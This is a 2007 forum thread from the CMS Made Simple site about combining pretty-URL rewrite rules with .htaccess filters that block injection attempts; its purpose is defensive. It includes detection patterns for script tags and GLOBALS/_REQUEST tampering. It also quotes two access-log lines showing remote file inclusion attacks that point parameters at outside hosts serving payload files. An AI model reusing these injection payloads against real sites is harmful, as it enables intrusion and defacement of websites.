CMS Made Simple Forums

Content management as it is meant to be
https://forum.cmsmadesimple.org/

[SOLVED].htacces URL Filtering combined with Pretty URLS

https://forum.cmsmadesimple.org/viewtopic.php?t=15402

Page 1 of 1

[SOLVED].htacces URL Filtering combined with Pretty URLS

Posted: Tue Sep 25, 2007 2:28 pm
by Signex
I have a website on which I`m using Mod_rewrite for pretty urls using this code

Code: Select all

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

# 301 Redirect all requests that don't contain a dot or trailing slash to
# include a trailing slash
RewriteCond %{REQUEST_URI} !/$
RewriteCond %{REQUEST_URI} !\.
RewriteRule ^(.*) %{REQUEST_URI}/ [R=301,L]

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f [NC]
RewriteCond %{REQUEST_FILENAME} !-d [NC]
RewriteRule ^(.+)$ index.php?page=$1 [QSA]
This method works fine, but now I want to include some url filtering to block potentail hackers. I want to include this code

Code: Select all

#IF the URI contains a "http:"
RewriteCond %{REQUEST_URI} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{REQUEST_URI} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{REQUEST_URI} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{REQUEST_URI} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{REQUEST_URI} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{REQUEST_URI} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) 

RewriteRule ^.*$ - [F,L]
So basicly I end up with this when I combine both

Code: Select all

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

#IF the URI contains a "http:"
RewriteCond %{REQUEST_URI} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{REQUEST_URI} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{REQUEST_URI} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{REQUEST_URI} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{REQUEST_URI} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{REQUEST_URI} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

RewriteRule ^.*$ - [F,L] 

# 301 Redirect all requests that don't contain a dot or trailing slash to
# include a trailing slash
RewriteCond %{REQUEST_URI} !/$
RewriteCond %{REQUEST_URI} !\.
RewriteRule ^(.*) %{REQUEST_URI}/ [R=301,L]

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f [NC]
RewriteCond %{REQUEST_FILENAME} !-d [NC]
RewriteRule ^(.+)$ index.php?page=$1 [QSA]
But pretty urls still work, but url filtering doesnt, it gives 404 errors instead of 403 errors like it should. If i try only the url filtering on a website which doesnt use pretty url mod_rewrtie the url filtering works fine?

Any ideas on how i can get both url filtering and pretty urls to work ?

Thank You.

Re: .htacces URL Filtering combined with Pretty URLS

Posted: Tue Sep 25, 2007 5:23 pm
by Signex
Solved in this topic : http://forum.cmsmadesimple.org/index.ph ... 45.15.html

using this code pretty urls en filtering works:

Code: Select all

ErrorDocument 403 /forbidden403.html

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

#IF the URI contains a "http:"
RewriteCond %{QUERY_STRING} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{QUERY_STRING} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{QUERY_STRING} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) 

RewriteRule ^.*$ - [F,L] 

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule ^(.+)$ index.php?page=$1 [QSA]

Re: .htacces URL Filtering combined with Pretty URLS

Posted: Thu Nov 22, 2007 1:30 pm
by kermit
Signex wrote: Solved in this topic : http://forum.cmsmadesimple.org/index.ph ... 45.15.html

using this code pretty urls en filtering works:

Code: Select all

ErrorDocument 403 /forbidden403.html

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

#IF the URI contains a "http:"
RewriteCond %{QUERY_STRING} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{QUERY_STRING} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{QUERY_STRING} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) 

RewriteRule ^.*$ - [F,L] 

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule ^(.+)$ index.php?page=$1 [QSA]
attached is an example of how effective these few lines are...

even if there isn't any exploitable bugs in cmsms; there's no good reason not to add the url filtering to you htaccess file..

Re: .htacces URL Filtering combined with Pretty URLS

Posted: Thu Nov 22, 2007 2:59 pm
by Pierre M.
Hello,
kermit wrote: attached is an example of how effective these few lines are...
The image shows 403 in logs. So your rules are effective, yes they block requests. I'd like to see against what they are effective : what are the naughty URLs it has denied access, before they reach PHP/CMSms ?
kermit wrote: there's no good reason not to add the url filtering to you htaccess file..
Amen.

Pierre M.

Re: .htacces URL Filtering combined with Pretty URLS

Posted: Thu Nov 22, 2007 5:00 pm
by kermit
Pierre M. wrote: I'd like to see against what they are effective : what are the naughty URLs it has denied access, before they reach PHP/CMSms ?

most of those were all in about 20 minutes time... they were all one of these two (or variations of them):

Code: Select all

218.232.75.175 - - [20/Nov/2007:18:19:49 -0800] "GET /include/main.php?config[search_disp]=true&include_dir=http://1-content.com/safe.gif? HTTP/1.1" 403 666 "-" "libwww-perl/5.79"
213.192.241.64 - - [20/Nov/2007:21:49:19 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 403 666 "-" "libwww-perl/5.803"

the useragent libwww-perl would be nearly as effective (and would also nail some 'bad' bots in the process) to filter...  these clowns can deface thousands of websites in a matter of minutes.. yet they have yet to master the art of faking useragent strings to get around those types of filters?!?!

Re: [SOLVED].htacces URL Filtering combined with Pretty URLS

Posted: Fri Nov 23, 2007 5:29 pm
by Pierre M.
Thank you kermit for the feedback.
They don't fake the useragent : LOL :-D

Pierre M.
All times are UTC
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited